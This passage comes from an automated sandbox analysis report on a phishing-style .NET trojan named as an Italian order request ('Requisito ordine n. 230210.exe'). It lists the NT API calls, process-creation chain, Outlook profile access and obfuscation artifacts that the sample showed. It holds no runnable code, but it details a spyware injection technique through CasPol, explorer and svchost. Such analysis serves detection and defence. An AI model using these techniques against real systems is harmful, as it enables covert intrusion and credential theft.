          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F2D071_2_016F2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163D5E01_2_0163D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F25DD1_2_016F25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016525811_2_01652581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D821_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016ED4661_2_016ED466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163841F1_2_0163841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E44961_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F1FF11_2_016F1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016FDFCE1_2_016FDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01646E301_2_01646E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016ED6161_2_016ED616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F2EF71_2_016F2EF7
          Source: C:\Windows\explorer.exeCode function: 2_2_085D4C522_2_085D4C52
          Source: C:\Windows\explorer.exeCode function: 2_2_085D4C472_2_085D4C47
          Source: C:\Windows\explorer.exeCode function: 2_2_085D6C7A2_2_085D6C7A
          Source: C:\Windows\explorer.exeCode function: 2_2_085D92722_2_085D9272
          Source: C:\Windows\explorer.exeCode function: 2_2_085D9E722_2_085D9E72
          Source: C:\Windows\explorer.exeCode function: 2_2_085DA2122_2_085DA212
          Source: C:\Windows\explorer.exeCode function: 2_2_085DB8122_2_085DB812
          Source: C:\Windows\explorer.exeCode function: 2_2_085DA2062_2_085DA206
          Source: C:\Windows\explorer.exeCode function: 2_2_085D52892_2_085D5289
          Source: C:\Windows\explorer.exeCode function: 2_2_085D6C822_2_085D6C82
          Source: C:\Windows\explorer.exeCode function: 2_2_085DAF5A2_2_085DAF5A
          Source: C:\Windows\explorer.exeCode function: 2_2_085D9D522_2_085D9D52
          Source: C:\Windows\explorer.exeCode function: 2_2_085D7FB22_2_085D7FB2
          Source: C:\Windows\explorer.exeCode function: 2_2_1080BC822_2_1080BC82
          Source: C:\Windows\explorer.exeCode function: 2_2_1080A2892_2_1080A289
          Source: C:\Windows\explorer.exeCode function: 2_2_1080F2062_2_1080F206
          Source: C:\Windows\explorer.exeCode function: 2_2_1080F2122_2_1080F212
          Source: C:\Windows\explorer.exeCode function: 2_2_108108122_2_10810812
          Source: C:\Windows\explorer.exeCode function: 2_2_10809C472_2_10809C47
          Source: C:\Windows\explorer.exeCode function: 2_2_10809C522_2_10809C52
          Source: C:\Windows\explorer.exeCode function: 2_2_1080E2722_2_1080E272
          Source: C:\Windows\explorer.exeCode function: 2_2_1080EE722_2_1080EE72
          Source: C:\Windows\explorer.exeCode function: 2_2_1080BC7A2_2_1080BC7A
          Source: C:\Windows\explorer.exeCode function: 2_2_1080CFB22_2_1080CFB2
          Source: C:\Windows\explorer.exeCode function: 2_2_1080ED522_2_1080ED52
          Source: C:\Windows\explorer.exeCode function: 2_2_1080FF5A2_2_1080FF5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F2B2811_2_032F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A30911_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324AB4011_2_0324AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325EBB011_2_0325EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032D23E311_2_032D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E03DA11_2_032E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032EDBD211_2_032EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325ABD811_2_0325ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032DFA2B11_2_032DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F22AE11_2_032F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324412011_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322F90011_2_0322F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032499BF11_2_032499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032FE82411_2_032FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A83011_2_0324A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E100211_2_032E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032520A011_2_032520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F20A811_2_032F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0323B09011_2_0323B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F28EC11_2_032F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F1FF111_2_032F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032FDFCE11_2_032FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03246E3011_2_03246E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032ED61611_2_032ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F2EF711_2_032F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03220D2011_2_03220D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F2D0711_2_032F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F1D5511_2_032F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325258111_2_03252581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E2D8211_2_032E2D82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0323D5E011_2_0323D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F25DD11_2_032F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0323841F11_2_0323841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032ED46611_2_032ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E449611_2_032E4496
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C28D7011_2_02C28D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C21AD011_2_02C21AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3FA9E11_2_02C3FA9E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C23A5011_2_02C23A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C2A20011_2_02C2A200
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C4021C11_2_02C4021C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3FBEC11_2_02C3FBEC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C2382711_2_02C23827
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C2383011_2_02C23830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C2A1FB11_2_02C2A1FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3E93011_2_02C3E930
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C40E7511_2_02C40E75
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3FDE511_2_02C3FDE5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0162B150 appears 133 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B150 appears 133 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E5B3 NtCreateFile,1_2_0041E5B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E663 NtReadFile,1_2_0041E663
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E6E3 NtClose,1_2_0041E6E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E793 NtAllocateVirtualMemory,1_2_0041E793
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E65D NtReadFile,1_2_0041E65D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E6DE NtClose,1_2_0041E6DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0041E78D NtAllocateVirtualMemory,1_2_0041E78D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01669910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016699A0 NtCreateSection,LdrInitializeThunk,1_2_016699A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01669860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669840 NtDelayExecution,LdrInitializeThunk,1_2_01669840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_016698F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669A50 NtCreateFile,LdrInitializeThunk,1_2_01669A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669A20 NtResumeThread,LdrInitializeThunk,1_2_01669A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01669A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669540 NtReadFile,LdrInitializeThunk,1_2_01669540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016695D0 NtClose,LdrInitializeThunk,1_2_016695D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669710 NtQueryInformationToken,LdrInitializeThunk,1_2_01669710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669FE0 NtCreateMutant,LdrInitializeThunk,1_2_01669FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_016697A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669780 NtMapViewOfSection,LdrInitializeThunk,1_2_01669780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01669660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_016696E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669950 NtQueueApcThread,1_2_01669950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016699D0 NtCreateProcessEx,1_2_016699D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166B040 NtSuspendThread,1_2_0166B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669820 NtEnumerateKey,1_2_01669820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016698A0 NtWriteVirtualMemory,1_2_016698A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669B00 NtSetValueKey,1_2_01669B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166A3B0 NtGetContextThread,1_2_0166A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669A10 NtQuerySection,1_2_01669A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669A80 NtOpenDirectoryObject,1_2_01669A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669560 NtWriteFile,1_2_01669560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669520 NtWaitForSingleObject,1_2_01669520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166AD30 NtSetContextThread,1_2_0166AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016695F0 NtQueryInformationFile,1_2_016695F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669760 NtOpenProcess,1_2_01669760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669770 NtSetInformationFile,1_2_01669770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166A770 NtOpenThread,1_2_0166A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669730 NtQueryVirtualMemory,1_2_01669730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166A710 NtOpenProcessToken,1_2_0166A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669670 NtQueryInformationProcess,1_2_01669670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669650 NtQueryValueKey,1_2_01669650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01669610 NtEnumerateValueKey,1_2_01669610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016696D0 NtCreateKey,1_2_016696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A50 NtCreateFile,LdrInitializeThunk,11_2_03269A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_03269910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032699A0 NtCreateSection,LdrInitializeThunk,11_2_032699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269860 NtQuerySystemInformation,LdrInitializeThunk,11_2_03269860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269840 NtDelayExecution,LdrInitializeThunk,11_2_03269840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269710 NtQueryInformationToken,LdrInitializeThunk,11_2_03269710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269780 NtMapViewOfSection,LdrInitializeThunk,11_2_03269780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269FE0 NtCreateMutant,LdrInitializeThunk,11_2_03269FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269610 NtEnumerateValueKey,LdrInitializeThunk,11_2_03269610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03269660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269650 NtQueryValueKey,LdrInitializeThunk,11_2_03269650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032696E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_032696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032696D0 NtCreateKey,LdrInitializeThunk,11_2_032696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269560 NtWriteFile,LdrInitializeThunk,11_2_03269560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269540 NtReadFile,LdrInitializeThunk,11_2_03269540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032695D0 NtClose,LdrInitializeThunk,11_2_032695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269B00 NtSetValueKey,11_2_03269B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326A3B0 NtGetContextThread,11_2_0326A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A20 NtResumeThread,11_2_03269A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A00 NtProtectVirtualMemory,11_2_03269A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A10 NtQuerySection,11_2_03269A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269A80 NtOpenDirectoryObject,11_2_03269A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269950 NtQueueApcThread,11_2_03269950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032699D0 NtCreateProcessEx,11_2_032699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269820 NtEnumerateKey,11_2_03269820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326B040 NtSuspendThread,11_2_0326B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032698A0 NtWriteVirtualMemory,11_2_032698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032698F0 NtReadVirtualMemory,11_2_032698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269730 NtQueryVirtualMemory,11_2_03269730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326A710 NtOpenProcessToken,11_2_0326A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269760 NtOpenProcess,11_2_03269760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326A770 NtOpenThread,11_2_0326A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269770 NtSetInformationFile,11_2_03269770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032697A0 NtUnmapViewOfSection,11_2_032697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269670 NtQueryInformationProcess,11_2_03269670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03269520 NtWaitForSingleObject,11_2_03269520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326AD30 NtSetContextThread,11_2_0326AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032695F0 NtQueryInformationFile,11_2_032695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3CA10 NtAllocateVirtualMemory,11_2_02C3CA10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C8E0 NtReadFile,11_2_02C3C8E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C830 NtCreateFile,11_2_02C3C830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C960 NtClose,11_2_02C3C960
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C930 NtDeleteFile,11_2_02C3C930
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3CA0A NtAllocateVirtualMemory,11_2_02C3CA0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C8DA NtReadFile,11_2_02C3C8DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_02C3C95B NtClose,11_2_02C3C95B
          Source: Requisito ordine n. 230210.exeStatic PE information: No import functions for PE file found
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269239025.00000222752EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000000.255259098.0000022275106000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNNbBbB.exe. vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exe, 00000000.00000002.269766071.0000022275440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Requisito ordine n. 230210.exe
          Source: Requisito ordine n. 230210.exeBinary or memory string: OriginalFilenameNNbBbB.exe. vs Requisito ordine n. 230210.exe
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeSection loaded: mscorjit.dllJump to behavior
          Source: Requisito ordine n. 230210.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Requisito ordine n. 230210.exeReversingLabs: Detection: 17%
          Source: Requisito ordine n. 230210.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Requisito ordine n. 230210.exe C:\Users\user\Desktop\Requisito ordine n. 230210.exe
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Requisito ordine n. 230210.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\50-ET7Wv7Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/2@13/8
          Source: Requisito ordine n. 230210.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3788:120:WilError_01
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: Requisito ordine n. 230210.exe, dg3ypDAonQcOidMs0w/WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Requisito ordine n. 230210.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Requisito ordine n. 230210.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Requisito ordine n. 230210.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdbBSJB source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000002.00000002.537406866.0000000015163000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003543000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.521972802.0000000000612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\FUCKYOU.pdb source: Requisito ordine n. 230210.exe, 00000000.00000002.269739966.0000022275420000.00000004.08000000.00040000.00000000.sdmp, Requisito ordine n. 230210.exe, 00000000.00000002.265960363.000002220001D000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000001.00000003.267869685.0000000001469000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.265699663.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.312421979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.313932264.0000000003000000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: CasPol.exe, 00000001.00000002.313724711.0000000003210000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: NNbBbB.pdb source: Requisito ordine n. 230210.exe

          Data Obfuscation

          barindex
